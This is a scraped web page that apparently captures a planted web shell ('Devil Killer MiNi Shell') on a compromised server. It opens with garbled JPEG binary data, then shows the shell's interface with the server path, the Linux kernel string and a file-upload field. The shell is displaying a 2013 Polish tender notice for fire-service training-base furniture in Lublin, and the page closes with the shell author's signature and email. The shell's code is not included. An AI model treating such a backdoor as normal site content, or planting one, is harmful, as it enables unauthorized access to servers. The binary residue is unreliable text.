JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130826/169701-N-2013.html

<p class="kh_header"><b>Lublin: Dostawa mebli stanowiących wyposażenie Bazy Szkoleniowej Komendy Wojewódzkiej Państwowej Straży Pożarnej w Lublinie 
(nr sprawy WL.2370.17.13)</b><br>
<b>Numer ogłoszenia: 169701 - 2013; data zamieszczenia: 26.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Państwowej Straży Pożarnej w Lublinie , ul. Strażacka 7, 20-012 Lublin, woj. lubelskie, tel. 081 5351240.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kwpsp-lublin.netbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli stanowiących wyposażenie Bazy Szkoleniowej Komendy Wojewódzkiej Państwowej Straży Pożarnej w Lublinie 
(nr sprawy WL.2370.17.13).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z montażem i instalacją mebli stanowiących wyposażenie Bazy Szkoleniowej Komendy Wojewódzkiej Państwowej Straży Pożarnej w Lublinie.
W ramach dostawy Wykonawca zobowiązuje się do dostarczenia, montażu i instalacji mebli będących przedmiotem niniejszego zamówienia. Obowiązki te Wykonawca wykona w siedzibie Bazy Szkoleniowej Komendy Wojewódzkiej PSP w Lublinie, przy ul. Grygowej 10 w Lublinie. 
Wykaz mebli:
1.Szafy gospodarcze szt. 3
Szafa metalowa z blachy gr. 0,8 mm malowana proszkowo na kolor RAL 3025, drzwi    z zamkiem cylindrycznym ryglującym drzwi w min. 3 punktach z przedziałem na przechowywanie odzieży, środków czystości, wiader, szczotek, itp. Wymiary: szer. 600, głęb. 500 wys. 1800. 
2.Szafy do szatni szt. 19
Szafa metalowa z blachy gr. 0,8 mm malowana proszkowo na kolor beżowy, drzwi       z zamkiem cylindrycznym ryglującym drzwi w min. 3 punktach wyposażona w drążek, haczyk półkę oraz lusterko na podstawie z wysuwaną ławką.Drzwi wentylowane. Wymiary: szer. 600, głęb. 500 wys.  max. 2200.
3.Szafy magazynowe szt.18
Szafa metalowa z blachy gr. 0,8 mm malowana proszkowo na kolor RAL 5012 , drzwi  z zamkiem cylindrycznym ryglującym drzwi w min. 3 punktach wyposażona w cztery półki. Drzwi wentylowane. Wymiary: szer. 800, głęb. 500 wys. 1800.
4. Kozetka szt. 1
Konstrukcja metalowa wyposażona na stałe w wieszak na prześcieradło jednorazowe z płynną regulacją kąta zagłówka. Pokrycie zmywalne typu derma w kolorze RAL 6033 lub zbliżonym.  Wymiary: (+/- 10 cm) szer. 65 cm. długość 195 cm. wysokość 65 cm., kąt nachylenia +/- 30°, obciążenie min. 140 kg
5. Szafa lekarska  szt.1
Korpus szafy wykonany z blachy zabezpieczonej farbą proszkową w kolorze RAL 6033, drzwi szafy przeszklone ze szkła hartowanego. Szklane półki 4 szt. przestawne co 25 mm. Uchwyt drzwiowy posiadający zamek zabezpieczający ryglujący drzwi w dwóch punktach. Wymiary (+/- 15%) szaf- jednodrzwiowa 1890x600x435 szt. 1; dwudrzwiowa 1890x800x435 szt. 1
6.Biurko lekarskie szt.1
Konstrukcja z blachy stalowej pokrytej farba proszkową w kolorze RAL 6033 wyposażone w 2 szuflady przystosowane do formatu kart chorób pacjentów z centralnym zamkiem. Blat laminowany. Wymiary (+/ 20%) 740x1200x600.
7.Kosze na odpadki szt. 20
Kosze poj. 12 l: stal matowa. Wyposażone  w wewnętrzne plastikowe wiaderko. Posiadają antypoślizgowe pedały i wygodne metalowe rączki ułatwiające przenoszenie. Plastikowy ring na podstawie kosza zapobiega zarysowaniem podłogi.
8.Stoły warsztatowe szt. 2
Konstrukcja z kształtowników stalowych, bat ze sklejki 45 mm pokrytej guma gładką. Wyposażony w dwie szafki; jedna z półkami, druga z czterema szufladami, zamykane na zamek centralny cylindryczny w kolorze popielato-niebieskim. Wymiary szer.2100 x wys.900 x gł.740.
9.Szafy ubraniowe szt. 3
Elementy konstrukcyjne, drzwi i półki z płyty laminowanej gr. 18 mm. Drzwi zamykane na zamek. Wyposażone w półkę na górze i drążek do wieszania odzieży. Uchwyty metalowe satynowe pionowe. Kolor orzech lub podobny do uzgodnienia. Wymiary szer. 800 gł. 600 wys. 2000.
10.Szafy biurowe szt. 9
Elementy konstrukcyjne, drzwi i półki z płyty laminowanej gr. 18 mm. Drzwi zamykane na zamek. Wyposażone cztery  półki. Uchwyty metalowe satynowe pionowe. Kolor orzech lub podobny do uzgodnienia. Wymiary szer. 800 gł. 600 wys. 2000.
11.Stół z umywalką szt. 1 
Blat wodoodporny  pogrubiony 36 mm z umywalką wpuszczaną szer. 50 cm z baterią kulową stojącą.  Szafki 2 szt. z płyty laminowanej gr. 18 mm z jedną półką. Uchwyty drzwiczek metalowe satynowe. Kolor buk lub podobny do uzgodnienia. Wymiary szer. 1400 gł. 600 wys. 850.
12.Stół roboczy szt. 1 
Blat wodoodporny  pogrubiony 36 mm ze zlewozmywakiem jednokomorowym 
z ociekaczem z baterią zlewozmywakową kulową stojącą.  Szafki 4 szt. z płyty laminowanej gr. 18 mm z jedną półką oraz 1 z czterema szufladami. Uchwyty drzwiczek metalowe satynowe. Kolor buk lub podobny do uzgodnienia. Wymiary szer. 3200 gł. 600 wys. 850
13.Stół roboczy szt. 1 
Blat wodoodporny  pogrubiony 36 mm ze zlewozmywakiem stalowym dwukomorowym  z baterią zlewozmywakową kulową stojącą i z otworem wrzutowym na odpadki.  Szafki 2 szt. z płyty laminowanej gr. 18 mm bez półek . Uchwyty drzwiczek metalowe satynowe. Kolor buk lub podobny do uzgodnienia. Wymiary szer. 2000 gł. 600 wys. 850
14.Stół konferencyjny szt.4  
Blat pogrubiony 36 mm. Kolor orzech lub podobny do uzgodnienia. Konstrukcja stalowa w kolorze brązowym. Wymiary szer.2500 gł. 900 wys. 750. Kolor orzech lub podobny do uzgodnienia.
15.Szafki kuchenne szt. 3
Trzy sztuki szafek kuchennych z płyty laminowanej gr. 18 mm z półkami pokryte wspólnym blatem wodoodpornym, pogrubionym, z wbudowanym zlewozmywakiem jednokomorowym z ociekaczem z baterią stojącą kulową oraz umywalką o szer. ok. 40 cm z baterią stojącą kulową chromową. Uchwyty metalowe satynowe. Przestrzeń pomiędzy szafkami a ścianą zabezpieczona listwą przyścienną wodoodporną. Kolor buk lub podobny do uzgodnienia. Wymiary: całkowita dł. 2300 gł. 600 wys. 850. 
16. Szafki kuchenne szt. 3
Trzy sztuki szafek kuchennych z płyty laminowanej gr. 18 mm z półkami pokryte wspólnym blatem wodoodpornym, pogrubionym, z wbudowanym zlewozmywakiem jednokomorowym z ociekaczem z baterią stojącą kulową oraz umywalką o szer. ok. 40 cm z baterią stojącą kulową chromową. Uchwyty metalowe satynowe. Przestrzeń pomiędzy szafkami a ścianą zabezpieczona listwą przyścienną wodoodporną. Kolor buk lub podobny do uzgodnienia. Wymiary: całkowita dł. 2600 gł. 600 wys. 850.

W szczegółowym opisie przedmiotu zamówienia zostały zawarte minimalne wymagania dotyczące przedmiotu zamówienia. Wykonawcy mogą przedstawić oferty równoważne. Wykonawcy mogą zaproponować rozwiązania równoważne o takich samych parametrach lub je przewyższające, jednak ich obowiązkiem jest udowodnienie równoważności. Zamawiający akceptuje oferty równoważne, m.in. o ile spełnione są minimalne parametry podanych materiałów oraz komponentów.

Uwaga: Podane wyżej wymiary mebli mogą nieznacznie odbiegać od wymiarów miejsc, w których zostaną zamontowane (zlokalizowane). W związku z tym, przed wykonaniem mebli Wykonawca zobowiązany jest do dokonania pomiarów w miejscach, w których meble te zostaną zamontowane..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje w okresie 3 lat od udzielenia zamówienia podstawowego możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 20 % wartości zamówienia w przypadku, o którym mowa w art. 67 ust. 1 pkt 7 ustawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.12.12.00-8, 39.22.43.40-3, 44.41.10.00-4, 39.13.00.00-2, 39.14.13.00-5, 33.19.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazanie w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie realizacji dostaw mebli biurowych lub/i lekarskich lub/i roboczych o łącznej wartości co najmniej - 50 000 PLN lub równowartości tej kwoty wyrażonej w innej walucie wg kursu Narodowego Banku Polskiego w dniu sporządzenia oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie wymaganych uprawnień przez osoby, które będą uczestniczyć 
w wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 50 000 PLN lub równowartości tej kwoty wyrażonej 
w innej walucie wg kursu Narodowego Banku Polskiego w dniu sporządzenia oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kwpsp-lublin.netbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Państwowej Straży Pożarnej w Lublinie
ul. Strażacka 7
20-012 Lublin
P. 309.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2013 godzina 09:00, miejsce: Komenda Wojewódzka Państwowej Straży Pożarnej w Lublinie
ul. Strażacka 7
20-012 Lublin
Sekretariat (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dostawa jest realizowana w ramach projektu pn. Stworzenie strefy bezpieczeństwa publicznego na ul. Metalurgicznej w Lublinie etap: Adaptacja przestrzeni wraz z rewitalizacją obiektów po byłej bazie transportu URSUS dla potrzeb PSP na cele szkoleniowo-dydaktyczne finansowanego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego 2007-2013, Oś Priorytetowa III Atrakcyjność obszarów miejskich i tereny inwestycyjne, Działanie 3.2. Rewitalizacja zdegradowanych obszarów miejskich..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com